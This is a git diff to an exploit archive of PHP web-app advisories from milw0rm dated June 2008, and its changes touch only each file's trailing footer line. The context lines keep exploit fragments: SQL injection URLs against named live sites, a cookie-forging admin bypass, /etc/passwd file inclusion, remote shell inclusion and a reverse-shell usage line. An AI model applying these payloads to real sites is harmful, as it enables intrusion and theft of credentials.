[2008-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/5844.php b/platforms/php/webapps/5844.php index 596005ba0..5c71fd80e 100755 --- a/platforms/php/webapps/5844.php +++ b/platforms/php/webapps/5844.php @@ -70,4 +70,4 @@ while(1) } ?> -# milw0rm.com [2008-06-17] +# milw0rm.com [2008-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/5845.txt b/platforms/php/webapps/5845.txt index 4e0cdbffb..1d471dce3 100755 --- a/platforms/php/webapps/5845.txt +++ b/platforms/php/webapps/5845.txt @@ -11,4 +11,4 @@ exploit: javascript:document.cookie = "admin_access=1; path=/"; document.cookie = "admin_access=1; path=/"; ----- -# milw0rm.com [2008-06-17] +# milw0rm.com [2008-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/5846.txt b/platforms/php/webapps/5846.txt index be6618406..453e18065 100755 --- a/platforms/php/webapps/5846.txt +++ b/platforms/php/webapps/5846.txt @@ -54,4 +54,4 @@ columns ( , passwort , email , ) get the user column , USE group by :) , (( Thi ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-06-17] +# milw0rm.com [2008-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/5847.txt b/platforms/php/webapps/5847.txt index c592f0ee5..828a2ad92 100755 --- a/platforms/php/webapps/5847.txt +++ b/platforms/php/webapps/5847.txt @@ -12,4 +12,4 @@ Google Dork : "WebCalendar v1.0.4" Greatz : aLL My Friend'Z & nETKILLER -# milw0rm.com [2008-06-17] +# milw0rm.com [2008-06-17] \ No newline at end of file diff --git a/platforms/php/webapps/5848.txt b/platforms/php/webapps/5848.txt index eea116860..2dd2a0d09 100755 --- a/platforms/php/webapps/5848.txt +++ b/platforms/php/webapps/5848.txt @@ -78,4 +78,4 @@ SITE : www.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-18] +# milw0rm.com [2008-06-18] \ No newline at end of file diff --git a/platforms/php/webapps/5852.txt b/platforms/php/webapps/5852.txt index e3ad60164..57a64a304 100755 --- a/platforms/php/webapps/5852.txt +++ b/platforms/php/webapps/5852.txt @@ -45,4 +45,4 @@ ################################################################################################# ################################################################################################# -# milw0rm.com [2008-06-18] +# milw0rm.com [2008-06-18] \ No newline at end of file diff --git a/platforms/php/webapps/5853.txt b/platforms/php/webapps/5853.txt index 097719286..e8905550d 100755 --- a/platforms/php/webapps/5853.txt +++ b/platforms/php/webapps/5853.txt @@ -21,4 +21,4 @@ ## GREETZ : Mr.SQL , GOLD_M , H-T Team , His0k4 , Dark , Mohamed el arab , stack ================================================================= -# milw0rm.com [2008-06-18] +# milw0rm.com [2008-06-18] \ No newline at end of file diff --git a/platforms/php/webapps/5854.txt b/platforms/php/webapps/5854.txt index 9de567c64..a3b641b52 100755 --- a/platforms/php/webapps/5854.txt +++ b/platforms/php/webapps/5854.txt @@ -22,4 +22,4 @@ ## GREETZ : Mr.SQL , GOLD_M , H-T Team , His0k4 , Dark , Mohamed el arab , stack ================================================================================================ -# milw0rm.com [2008-06-18] +# milw0rm.com [2008-06-18] \ No newline at end of file diff --git a/platforms/php/webapps/5855.txt b/platforms/php/webapps/5855.txt index 3b46cc58c..132868148 100755 --- a/platforms/php/webapps/5855.txt +++ b/platforms/php/webapps/5855.txt @@ -51,4 +51,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-06-18] +# milw0rm.com [2008-06-18] \ No newline at end of file diff --git a/platforms/php/webapps/5856.txt b/platforms/php/webapps/5856.txt index 804ab1b62..17175c361 100755 --- a/platforms/php/webapps/5856.txt +++ b/platforms/php/webapps/5856.txt @@ -92,4 +92,4 @@ $exec_return); [ dun / 2008 ] -# milw0rm.com [2008-06-18] +# milw0rm.com [2008-06-18] \ No newline at end of file diff --git a/platforms/php/webapps/5857.txt b/platforms/php/webapps/5857.txt index f58d1c584..4293fe048 100755 --- a/platforms/php/webapps/5857.txt +++ b/platforms/php/webapps/5857.txt @@ -11,4 +11,4 @@ poc : http://site.co.il/index.php?cat=-1/**/UNION/**/SELECT/**/concat(char(58),u live demo http://www.carscripts.com/cars/index.php?cat=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database()),2,3/* -# milw0rm.com [2008-06-18] +# milw0rm.com [2008-06-18] \ No newline at end of file diff --git a/platforms/php/webapps/5858.txt b/platforms/php/webapps/5858.txt index 2d2700392..b38f9f540 100755 --- a/platforms/php/webapps/5858.txt +++ b/platforms/php/webapps/5858.txt @@ -7,4 +7,4 @@ poc : http://site.co.il/index.php?type=-1/**/UNION/**/SELECT/**/concat(char(58), live demo tested http://www.boatscripts.com/boats/index.php?type=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database())/* -# milw0rm.com [2008-06-18] +# milw0rm.com [2008-06-18] \ No newline at end of file diff --git a/platforms/php/webapps/5859.txt b/platforms/php/webapps/5859.txt index d0d024a3a..d94a33d9d 100755 --- a/platforms/php/webapps/5859.txt +++ b/platforms/php/webapps/5859.txt @@ -83,4 +83,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-06-19] +# milw0rm.com [2008-06-19] \ No newline at end of file diff --git a/platforms/php/webapps/5860.txt b/platforms/php/webapps/5860.txt index b2981ce51..7f926edf0 100755 --- a/platforms/php/webapps/5860.txt +++ b/platforms/php/webapps/5860.txt @@ -102,4 +102,4 @@ will open C:\xampp\htdocs\Own\db.php # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-19] +# milw0rm.com [2008-06-19] \ No newline at end of file diff --git a/platforms/php/webapps/5861.txt b/platforms/php/webapps/5861.txt index c05ea4d29..98d3e4f2d 100755 --- a/platforms/php/webapps/5861.txt +++ b/platforms/php/webapps/5861.txt @@ -92,4 +92,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-06-19] +# milw0rm.com [2008-06-19] \ No newline at end of file diff --git a/platforms/php/webapps/5862.txt b/platforms/php/webapps/5862.txt index cc645876a..64e6b5ca4 100755 --- a/platforms/php/webapps/5862.txt +++ b/platforms/php/webapps/5862.txt @@ -27,4 +27,4 @@ ******************************************************************************************* -# milw0rm.com [2008-06-19] +# milw0rm.com [2008-06-19] \ No newline at end of file diff --git a/platforms/php/webapps/5863.txt b/platforms/php/webapps/5863.txt index a08118248..0b9c7db41 100755 --- a/platforms/php/webapps/5863.txt +++ b/platforms/php/webapps/5863.txt @@ -27,4 +27,4 @@ ******************************************************************************************* -# milw0rm.com [2008-06-19] +# milw0rm.com [2008-06-19] \ No newline at end of file diff --git a/platforms/php/webapps/5864.txt b/platforms/php/webapps/5864.txt index a6e51ec8a..f4b0e50ec 100755 --- a/platforms/php/webapps/5864.txt +++ b/platforms/php/webapps/5864.txt @@ -35,4 +35,4 @@ http://127.0.0.1/cms/Orlando/AJAX/newscat.php?GLOBALS[preloc]=http://127.0.0.1/c ##################################################################### -# milw0rm.com [2008-06-19] +# milw0rm.com [2008-06-19] \ No newline at end of file diff --git a/platforms/php/webapps/5865.txt b/platforms/php/webapps/5865.txt index 49ef39b38..3648405d8 100755 --- a/platforms/php/webapps/5865.txt +++ b/platforms/php/webapps/5865.txt @@ -99,4 +99,4 @@ sub usage() } #eof -# milw0rm.com [2008-06-19] +# milw0rm.com [2008-06-19] \ No newline at end of file diff --git a/platforms/php/webapps/5866.txt b/platforms/php/webapps/5866.txt index 9abb8c752..2e9180e8d 100755 --- a/platforms/php/webapps/5866.txt +++ b/platforms/php/webapps/5866.txt @@ -36,4 +36,4 @@ EXPLOIT : ##################################################################### -# milw0rm.com [2008-06-19] +# milw0rm.com [2008-06-19] \ No newline at end of file diff --git a/platforms/php/webapps/5867.txt b/platforms/php/webapps/5867.txt index 29f73a945..fea02e683 100755 --- a/platforms/php/webapps/5867.txt +++ b/platforms/php/webapps/5867.txt @@ -37,4 +37,4 @@ admin/index.php #################################(and All IRAQIs)############################### ################################################################################ -# milw0rm.com [2008-06-19] +# milw0rm.com [2008-06-19] \ No newline at end of file diff --git a/platforms/php/webapps/5868.txt b/platforms/php/webapps/5868.txt index e7aeec816..ccdcd13d3 100755 --- a/platforms/php/webapps/5868.txt +++ b/platforms/php/webapps/5868.txt @@ -36,4 +36,4 @@ admin/adminindex.php #################################(and All IRAQIs)############################### ################################################################################ -# milw0rm.com [2008-06-19] +# milw0rm.com [2008-06-19] \ No newline at end of file diff --git a/platforms/php/webapps/5870.txt b/platforms/php/webapps/5870.txt index 2d11ad8d0..0b44ab436 100755 --- a/platforms/php/webapps/5870.txt +++ b/platforms/php/webapps/5870.txt @@ -64,4 +64,4 @@ Contact: admin[4t}bugreport{d0t]ir WwW.BugReport.ir WwW.AmnPardaz.com -# milw0rm.com [2008-06-20] +# milw0rm.com [2008-06-20] \ No newline at end of file diff --git a/platforms/php/webapps/5871.txt b/platforms/php/webapps/5871.txt index 3fed66e58..1cdab5d21 100755 --- a/platforms/php/webapps/5871.txt +++ b/platforms/php/webapps/5871.txt @@ -25,4 +25,4 @@ Proof of Concept : http://[host]/[FireAnt1.3]/index.php?page=../../../../etc/passwd%00 http://[host]/[FireAnt1.3]/index.php?page=../../../../[local_file]%00 -# milw0rm.com [2008-06-20] +# milw0rm.com [2008-06-20] \ No newline at end of file diff --git a/platforms/php/webapps/5872.txt b/platforms/php/webapps/5872.txt index 897e59a5e..a9e2de7b2 100755 --- a/platforms/php/webapps/5872.txt +++ b/platforms/php/webapps/5872.txt @@ -28,4 +28,4 @@ PoC : # ################################################################################### -# milw0rm.com [2008-06-20] +# milw0rm.com [2008-06-20] \ No newline at end of file diff --git a/platforms/php/webapps/5873.txt b/platforms/php/webapps/5873.txt index 08df52406..4018aa705 100755 --- a/platforms/php/webapps/5873.txt +++ b/platforms/php/webapps/5873.txt @@ -50,4 +50,4 @@ uploaded, but does not check for image validity. Although a phpshell cannot be executed through this method, a source may be uploaded for inclusion in further attacks, possibly an LFI somewhere on the server. -# milw0rm.com [2008-06-20] +# milw0rm.com [2008-06-20] \ No newline at end of file diff --git a/platforms/php/webapps/5874.txt b/platforms/php/webapps/5874.txt index 3d4998e3a..6d39344d2 100755 --- a/platforms/php/webapps/5874.txt +++ b/platforms/php/webapps/5874.txt @@ -33,4 +33,4 @@ while ( $row = mysql_fetch_array( $sql ) ){ include($page); } -# milw0rm.com [2008-06-20] +# milw0rm.com [2008-06-20] \ No newline at end of file diff --git a/platforms/php/webapps/5875.txt b/platforms/php/webapps/5875.txt index fd2c128e4..d526aefca 100755 --- a/platforms/php/webapps/5875.txt +++ b/platforms/php/webapps/5875.txt @@ -47,4 +47,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-06-20] +# milw0rm.com [2008-06-20] \ No newline at end of file diff --git a/platforms/php/webapps/5876.txt b/platforms/php/webapps/5876.txt index af6f95803..91a52951a 100755 --- a/platforms/php/webapps/5876.txt +++ b/platforms/php/webapps/5876.txt @@ -15,4 +15,4 @@ require_once("{$jamroom['jm_dir']}/include/jamroom-payment.inc.php"); Bug Found: http://www.site.com/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=[shell] -# milw0rm.com [2008-06-20] +# milw0rm.com [2008-06-20] \ No newline at end of file diff --git a/platforms/php/webapps/5877.txt b/platforms/php/webapps/5877.txt index 0649418e4..dbccda812 100755 --- a/platforms/php/webapps/5877.txt +++ b/platforms/php/webapps/5877.txt @@ -78,4 +78,4 @@ SITE : www.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-20] +# milw0rm.com [2008-06-20] \ No newline at end of file diff --git a/platforms/php/webapps/5878.txt b/platforms/php/webapps/5878.txt index 5cc7c43e0..e2bd86657 100755 --- a/platforms/php/webapps/5878.txt +++ b/platforms/php/webapps/5878.txt @@ -16,4 +16,4 @@ http://www.emusoft.org/index.php?page=category&cat_id=-9999+union+all+select+1,c www.1923turk.org turkish-warriorr@hotmail.com -# milw0rm.com [2008-06-20] +# milw0rm.com [2008-06-20] \ No newline at end of file diff --git a/platforms/php/webapps/5879.txt b/platforms/php/webapps/5879.txt index 30d885107..31c1d0cf5 100755 --- a/platforms/php/webapps/5879.txt +++ b/platforms/php/webapps/5879.txt @@ -53,4 +53,4 @@ This script not >> (( phpAuction GPL )) (( password Md5 )) ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-06-20] +# milw0rm.com [2008-06-20] \ No newline at end of file diff --git a/platforms/php/webapps/5880.txt b/platforms/php/webapps/5880.txt index fd2117d4c..b338e0bf8 100755 --- a/platforms/php/webapps/5880.txt +++ b/platforms/php/webapps/5880.txt @@ -57,4 +57,4 @@ SITE : www.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-21] +# milw0rm.com [2008-06-21] \ No newline at end of file diff --git a/platforms/php/webapps/5881.txt b/platforms/php/webapps/5881.txt index 621879776..62922b364 100755 --- a/platforms/php/webapps/5881.txt +++ b/platforms/php/webapps/5881.txt @@ -45,4 +45,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-06-21] +# milw0rm.com [2008-06-21] \ No newline at end of file diff --git a/platforms/php/webapps/5882.txt b/platforms/php/webapps/5882.txt index d20859a40..b5bc90a62 100755 --- a/platforms/php/webapps/5882.txt +++ b/platforms/php/webapps/5882.txt @@ -26,4 +26,4 @@ http://[site]/delete.php?delete=[eNews_id] tnx : aLL my FriEndZ -# milw0rm.com [2008-06-21] +# milw0rm.com [2008-06-21] \ No newline at end of file diff --git a/platforms/php/webapps/5883.txt b/platforms/php/webapps/5883.txt index 17c6c7a56..1267dca90 100755 --- a/platforms/php/webapps/5883.txt +++ b/platforms/php/webapps/5883.txt @@ -38,4 +38,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-06-21] +# milw0rm.com [2008-06-21] \ No newline at end of file diff --git a/platforms/php/webapps/5884.txt b/platforms/php/webapps/5884.txt index 3faae64ac..2ea52f4ef 100755 --- a/platforms/php/webapps/5884.txt +++ b/platforms/php/webapps/5884.txt @@ -114,4 +114,4 @@ ____________________________________________________________________________ EOF -# milw0rm.com [2008-06-21] +# milw0rm.com [2008-06-21] \ No newline at end of file diff --git a/platforms/php/webapps/5885.pl b/platforms/php/webapps/5885.pl index 5cc32c0f3..89530f0d8 100755 --- a/platforms/php/webapps/5885.pl +++ b/platforms/php/webapps/5885.pl @@ -41,4 +41,4 @@ while($done) { print "Username: sysadmin Password: ".$res."\n"; exit; -# milw0rm.com [2008-06-21] +# milw0rm.com [2008-06-21] \ No newline at end of file diff --git a/platforms/php/webapps/5886.pl b/platforms/php/webapps/5886.pl index bc13dc914..0940f2ec2 100755 --- a/platforms/php/webapps/5886.pl +++ b/platforms/php/webapps/5886.pl @@ -34,4 +34,4 @@ if($re->is_success) { exit; -# milw0rm.com [2008-06-21] +# milw0rm.com [2008-06-21] \ No newline at end of file diff --git a/platforms/php/webapps/5887.pl b/platforms/php/webapps/5887.pl index c4f14ea00..660e14cf7 100755 --- a/platforms/php/webapps/5887.pl +++ b/platforms/php/webapps/5887.pl @@ -44,4 +44,4 @@ die "Exploit Failed, HTTP Request Failed!" unless $re->is_success; print "File Uploaded! Location: " . $host . "/cms/images/" . $fname . $ext . "\n"; exit; -# milw0rm.com [2008-06-21] +# milw0rm.com [2008-06-21] \ No newline at end of file diff --git a/platforms/php/webapps/5888.txt b/platforms/php/webapps/5888.txt index f9791810e..d32465a39 100755 --- a/platforms/php/webapps/5888.txt +++ b/platforms/php/webapps/5888.txt @@ -88,4 +88,4 @@ -[*]+ CCLeague Pro <= 1.2 Insecure Cookie Authentication Vulnerability +[*]- -[*]+================================================================================+[*]- -# milw0rm.com [2008-06-21] +# milw0rm.com [2008-06-21] \ No newline at end of file diff --git a/platforms/php/webapps/5889.txt b/platforms/php/webapps/5889.txt index 8af6b75b5..504b8137d 100755 --- a/platforms/php/webapps/5889.txt +++ b/platforms/php/webapps/5889.txt @@ -55,4 +55,4 @@ For Users: http://site.com/teams.php?fflteam_id=-1/**/UNION/**/ALL/**/SELECT/**/ -[*]+ OFFL <= 0.2.6 Remote SQL Injection Vulnerability +[*]- -[*]+================================================================================+[*]- -# milw0rm.com [2008-06-21] +# milw0rm.com [2008-06-21] \ No newline at end of file diff --git a/platforms/php/webapps/5890.txt b/platforms/php/webapps/5890.txt index 7ff4fcceb..6b797e07a 100755 --- a/platforms/php/webapps/5890.txt +++ b/platforms/php/webapps/5890.txt @@ -56,4 +56,4 @@ admin/index.php #################################(and All IRAQIs)############################### ################################################################################ -# milw0rm.com [2008-06-21] +# milw0rm.com [2008-06-21] \ No newline at end of file diff --git a/platforms/php/webapps/5892.txt b/platforms/php/webapps/5892.txt index be5018b45..c27b7e39f 100755 --- a/platforms/php/webapps/5892.txt +++ b/platforms/php/webapps/5892.txt @@ -46,4 +46,4 @@ admin/index.php #################################(and All IRAQIs)############################### ################################################################################ -# milw0rm.com [2008-06-21] +# milw0rm.com [2008-06-21] \ No newline at end of file diff --git a/platforms/php/webapps/5893.txt b/platforms/php/webapps/5893.txt index 2a6f57963..b04614871 100755 --- a/platforms/php/webapps/5893.txt +++ b/platforms/php/webapps/5893.txt @@ -18,4 +18,4 @@ [*] Greetings : All friends & muslims HaCkeRs... [*] Greetings2: http://palcastle.org/cc -# milw0rm.com [2008-06-22] +# milw0rm.com [2008-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/5895.txt b/platforms/php/webapps/5895.txt index d37523e32..0f0471691 100755 --- a/platforms/php/webapps/5895.txt +++ b/platforms/php/webapps/5895.txt @@ -50,4 +50,4 @@ http://target.com/path/Db/urun.mdb ############################################################### -# milw0rm.com [2008-06-22] +# milw0rm.com [2008-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/5896.txt b/platforms/php/webapps/5896.txt index cdf718706..5b0b57f31 100755 --- a/platforms/php/webapps/5896.txt +++ b/platforms/php/webapps/5896.txt @@ -80,4 +80,4 @@ SITE : www.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-22] +# milw0rm.com [2008-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/5898.pl b/platforms/php/webapps/5898.pl index 25475e962..8ed3c6505 100755 --- a/platforms/php/webapps/5898.pl +++ b/platforms/php/webapps/5898.pl @@ -213,4 +213,4 @@ Ex: $0 localhost /cgi-bin / ./php-reverse-shell.php 1234 EOM } -# milw0rm.com [2008-06-22] +# milw0rm.com [2008-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/5899.txt b/platforms/php/webapps/5899.txt index 8222b3749..1dfa4442a 100755 --- a/platforms/php/webapps/5899.txt +++ b/platforms/php/webapps/5899.txt @@ -59,4 +59,4 @@ SITE : www.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-22] +# milw0rm.com [2008-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/5900.txt b/platforms/php/webapps/5900.txt index 683a64baf..207965836 100755 --- a/platforms/php/webapps/5900.txt +++ b/platforms/php/webapps/5900.txt @@ -21,4 +21,4 @@ All Member Real Hack And All My Friends .. Found By Ghost Hacker & My TeaM R-H ############################################################## -# milw0rm.com [2008-06-22] +# milw0rm.com [2008-06-22] \ No newline at end of file diff --git a/platforms/php/webapps/5907.pl b/platforms/php/webapps/5907.pl index 435229b1e..31d17773b 100755 --- a/platforms/php/webapps/5907.pl +++ b/platforms/php/webapps/5907.pl @@ -26,4 +26,4 @@ if($re->is_success) { } else { print "HTTP Request Failed!\n"; } exit; -# milw0rm.com [2008-06-23] +# milw0rm.com [2008-06-23] \ No newline at end of file diff --git a/platforms/php/webapps/5908.txt b/platforms/php/webapps/5908.txt index b578db198..12f2898b2 100755 --- a/platforms/php/webapps/5908.txt +++ b/platforms/php/webapps/5908.txt @@ -6,4 +6,4 @@ // Exploit: index.php?go=0'+union+select+passwd+from+user+where+username=[USERNAME] -------------------------------------------------------------------------------------------------------------------------------- -# milw0rm.com [2008-06-23] +# milw0rm.com [2008-06-23] \ No newline at end of file diff --git a/platforms/php/webapps/5909.pl b/platforms/php/webapps/5909.pl index 7f7eb6c6a..eafc2902b 100755 --- a/platforms/php/webapps/5909.pl +++ b/platforms/php/webapps/5909.pl @@ -61,4 +61,4 @@ sub usage { } -# milw0rm.com [2008-06-23] +# milw0rm.com [2008-06-23] \ No newline at end of file diff --git a/platforms/php/webapps/5910.txt b/platforms/php/webapps/5910.txt index 892bb8884..caafe18d8 100755 --- a/platforms/php/webapps/5910.txt +++ b/platforms/php/webapps/5910.txt @@ -46,4 +46,4 @@ ####################################################################################################### ####################################################################################################### -# milw0rm.com [2008-06-23] +# milw0rm.com [2008-06-23] \ No newline at end of file diff --git a/platforms/php/webapps/5911.txt b/platforms/php/webapps/5911.txt index 5de88032b..b1da18aa7 100755 --- a/platforms/php/webapps/5911.txt +++ b/platforms/php/webapps/5911.txt @@ -35,4 +35,4 @@ ******************************************************************************************* -# milw0rm.com [2008-06-23] +# milw0rm.com [2008-06-23] \ No newline at end of file diff --git a/platforms/php/webapps/5913.txt b/platforms/php/webapps/5913.txt index 7e205f4d0..eedb54c75 100755 --- a/platforms/php/webapps/5913.txt +++ b/platforms/php/webapps/5913.txt @@ -64,4 +64,4 @@ SITE : www.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-23] +# milw0rm.com [2008-06-23] \ No newline at end of file diff --git a/platforms/php/webapps/5914.txt b/platforms/php/webapps/5914.txt index d595ae360..d8ef2888b 100755 --- a/platforms/php/webapps/5914.txt +++ b/platforms/php/webapps/5914.txt @@ -64,4 +64,4 @@ SITE : www.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-23] +# milw0rm.com [2008-06-23] \ No newline at end of file diff --git a/platforms/php/webapps/5915.txt b/platforms/php/webapps/5915.txt index a33d4234a..44f414b16 100755 --- a/platforms/php/webapps/5915.txt +++ b/platforms/php/webapps/5915.txt @@ -26,4 +26,4 @@ www.site.com/path/components/com_facileforms/facileforms.frame.php?ff_compath=[S < -- bug code end of -- > -# milw0rm.com [2008-06-23] +# milw0rm.com [2008-06-23] \ No newline at end of file diff --git a/platforms/php/webapps/5922.php b/platforms/php/webapps/5922.php index 2687d9c06..a3d5118eb 100755 --- a/platforms/php/webapps/5922.php +++ b/platforms/php/webapps/5922.php @@ -109,4 +109,4 @@ while(1) } ?> -# milw0rm.com [2008-06-23] +# milw0rm.com [2008-06-23] \ No newline at end of file diff --git a/platforms/php/webapps/5923.pl b/platforms/php/webapps/5923.pl index 0469d592b..e3747c08b 100755 --- a/platforms/php/webapps/5923.pl +++ b/platforms/php/webapps/5923.pl @@ -133,4 +133,4 @@ while(1) } ?> -# milw0rm.com [2008-06-23] +# milw0rm.com [2008-06-23] \ No newline at end of file diff --git a/platforms/php/webapps/5924.txt b/platforms/php/webapps/5924.txt index 5f4abba8e..e9be7d82e 100755 --- a/platforms/php/webapps/5924.txt +++ b/platforms/php/webapps/5924.txt @@ -97,4 +97,4 @@ Homepage: http://www.e-rdc.org/ -------------------------------- [ EOF ] ---------------------------------- -# milw0rm.com [2008-06-24] +# milw0rm.com [2008-06-24] \ No newline at end of file diff --git a/platforms/php/webapps/5925.txt b/platforms/php/webapps/5925.txt index 6e9917681..97e630295 100755 --- a/platforms/php/webapps/5925.txt +++ b/platforms/php/webapps/5925.txt @@ -48,4 +48,4 @@ SITE : www.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-24] +# milw0rm.com [2008-06-24] \ No newline at end of file diff --git a/platforms/php/webapps/5928.txt b/platforms/php/webapps/5928.txt index f88aa91e7..ff75677aa 100755 --- a/platforms/php/webapps/5928.txt +++ b/platforms/php/webapps/5928.txt @@ -49,4 +49,4 @@ ################################################################################################# ################################################################################################# -# milw0rm.com [2008-06-24] +# milw0rm.com [2008-06-24] \ No newline at end of file diff --git a/platforms/php/webapps/5929.txt b/platforms/php/webapps/5929.txt index 26e42ff63..3d78ca634 100755 --- a/platforms/php/webapps/5929.txt +++ b/platforms/php/webapps/5929.txt @@ -46,4 +46,4 @@ LoGiN : # # #################################(and All IRAQIs)############################### -# milw0rm.com [2008-06-24] +# milw0rm.com [2008-06-24] \ No newline at end of file diff --git a/platforms/php/webapps/5930.txt b/platforms/php/webapps/5930.txt index eae5efa34..267f45ccc 100755 --- a/platforms/php/webapps/5930.txt +++ b/platforms/php/webapps/5930.txt @@ -49,4 +49,4 @@ LogiN: #################################(and All IRAQIs)############################### ################################################################################ -# milw0rm.com [2008-06-24] +# milw0rm.com [2008-06-24] \ No newline at end of file diff --git a/platforms/php/webapps/5931.pl b/platforms/php/webapps/5931.pl index 269886991..0fb60e775 100755 --- a/platforms/php/webapps/5931.pl +++ b/platforms/php/webapps/5931.pl @@ -58,4 +58,4 @@ else { exit(); } -# milw0rm.com [2008-06-24] +# milw0rm.com [2008-06-24] \ No newline at end of file diff --git a/platforms/php/webapps/5932.txt b/platforms/php/webapps/5932.txt index 8ebb3b39b..2bac28f64 100755 --- a/platforms/php/webapps/5932.txt +++ b/platforms/php/webapps/5932.txt @@ -46,4 +46,4 @@ SITE : www.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-25] +# milw0rm.com [2008-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/5933.txt b/platforms/php/webapps/5933.txt index a7722cbde..e69420422 100755 --- a/platforms/php/webapps/5933.txt +++ b/platforms/php/webapps/5933.txt @@ -12,4 +12,4 @@ | http://dfn.dl.sourceforge.net/sourceforge/munky/munky-bliki-0.01a.tar.gz | @~~=========================================================================~~@ -# milw0rm.com [2008-06-25] +# milw0rm.com [2008-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/5934.txt b/platforms/php/webapps/5934.txt index 40a595111..43394f533 100755 --- a/platforms/php/webapps/5934.txt +++ b/platforms/php/webapps/5934.txt @@ -42,4 +42,4 @@ Login : # # #################################(and All IRAQIs)############################### -# milw0rm.com [2008-06-25] +# milw0rm.com [2008-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/5935.pl b/platforms/php/webapps/5935.pl index 81884e0a2..823556245 100755 --- a/platforms/php/webapps/5935.pl +++ b/platforms/php/webapps/5935.pl @@ -103,4 +103,4 @@ sub istrue2 } -# milw0rm.com [2008-06-25] +# milw0rm.com [2008-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/5936.txt b/platforms/php/webapps/5936.txt index f2b9fcc21..37d4bf53f 100755 --- a/platforms/php/webapps/5936.txt +++ b/platforms/php/webapps/5936.txt @@ -42,4 +42,4 @@ SITE : www.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-25] +# milw0rm.com [2008-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/5937.txt b/platforms/php/webapps/5937.txt index e8840f0c1..ffbf509b2 100755 --- a/platforms/php/webapps/5937.txt +++ b/platforms/php/webapps/5937.txt @@ -61,4 +61,4 @@ SITE : www.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-25] +# milw0rm.com [2008-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/5938.php b/platforms/php/webapps/5938.php index c9a7687c0..7c5a2bc87 100755 --- a/platforms/php/webapps/5938.php +++ b/platforms/php/webapps/5938.php @@ -231,4 +231,4 @@ while(1) ?> -# milw0rm.com [2008-06-25] +# milw0rm.com [2008-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/5939.txt b/platforms/php/webapps/5939.txt index 5c9da023e..9b069bdc6 100755 --- a/platforms/php/webapps/5939.txt +++ b/platforms/php/webapps/5939.txt @@ -18,4 +18,4 @@ [*] Greetings : All friends & muslims HaCkeRs... [*] Greetings2: http://palcastle.org/cc -# milw0rm.com [2008-06-25] +# milw0rm.com [2008-06-25] \ No newline at end of file diff --git a/platforms/php/webapps/5940.txt b/platforms/php/webapps/5940.txt index db6cbce8d..69c7da968 100755 --- a/platforms/php/webapps/5940.txt +++ b/platforms/php/webapps/5940.txt @@ -68,4 +68,4 @@ SITE : cwh.citec.us # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-26] +# milw0rm.com [2008-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/5941.txt b/platforms/php/webapps/5941.txt index b499cc9ad..b895ba623 100755 --- a/platforms/php/webapps/5941.txt +++ b/platforms/php/webapps/5941.txt @@ -56,4 +56,4 @@ This exploit can dump username and password in clear text # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ################################################################## -# milw0rm.com [2008-06-26] +# milw0rm.com [2008-06-26] \ No newline at end of file diff --git a/platforms/php/webapps/5942.txt b/platforms/php/webapps/5942.txt index 375e6e361..9a3250e26 100755 --- a/platforms/php/webapps/5942.txt +++ b/platforms/php/webapps/5942.txt @@ -38,4 +38,4 @@ ps. To find username use first "SQL" with table_name user_name, and for passwo ========================================================== Greetz to: All my Albanian brothers ========================================================== -# 